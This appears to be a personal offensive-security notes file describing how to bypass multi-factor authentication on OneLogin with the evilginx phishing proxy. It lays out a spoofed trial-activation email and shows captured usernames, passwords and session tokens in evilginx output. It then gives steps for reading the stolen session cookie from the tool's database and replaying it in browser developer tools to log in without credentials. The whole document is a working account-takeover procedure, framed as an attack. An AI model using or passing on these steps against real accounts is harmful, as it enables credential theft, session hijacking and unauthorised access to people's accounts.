MFA BYPASS

#example trigger
root@victim:~$ BROWSER > https://mail.google.com
 FROM: [email protected]
 SUBJECT: OneLogin - [Instructions] Activate your 30 Day OneLogin Trial

 redirect: {evilginx phish URL}

 * note: if users have some email security awareness training, they will be able to identify
   the malicious URLs whenever they hover their mouse on the links
    - if users aren't aware and clicked the links, they will be sent to the
      specified URLs being served by the evilginx server
      
    - evilginx will eventually capture anything the victim enters in the HTML fields to include username/password/tokens
       - once everything is captured, evilginx will redirect the user to any specified URLs or site
          - it is best to redirect users to the legitimate site!
          
#MFA Bypass using captured token re-use
root@oco:~$ sudo ./evilginx ...
evilginx:
 captured data...
  [05:46:00] [+++] [0] Username: [{[email protected]},remember_username]
  [05:46:10] [+++] [0] Password: [{arbitraryValue}]
  [05:46:03] [+++] [0] Detected authorization URL - tokens intercepted: /client/apps
   - captured tokens can be re-used to login to the legitimate site w/o supplying username or passwords

 * once the victim user enters their credentials, evilginx will capture the data
    - the captured credentials can then be used for account takeover

root@oco:~$ sudo -i
root@oco:~$ ls -la
 .evilginx
root@oco:~$ cd .evilginx/
root@oco:~$ ls
 blacklist.txt config.yaml crt data.db
root@oco:~$ cat data.db
 sub_session_onelogin.com...,Value: eyJ0eXA...
 * identified cookies will show up here
    - this cookie can be used to bypass login portals

#bypass method by going to the legitimate website
root@oco:~$ BROWSER > https://app.onelogin.com/login > F12 > Application > Storage > Cookies > Session Cookie
 Name: {sub_session_onelogin.com}
  - enter the cookie name captured in evilginx
 Value: {arbitraryValue}
  - enter/replace the current cookie value with the one captured in evilginx (if any)
 
 * ignore the login page as that is not necessary for cookie logins

root@oco:~$ BROWSER > https://app.onelogin.com
 * remove the entire parameter leaving only the subdomain.domain.tld URL
    - the cookie will take care of everything and will automatically log in via the cookie value
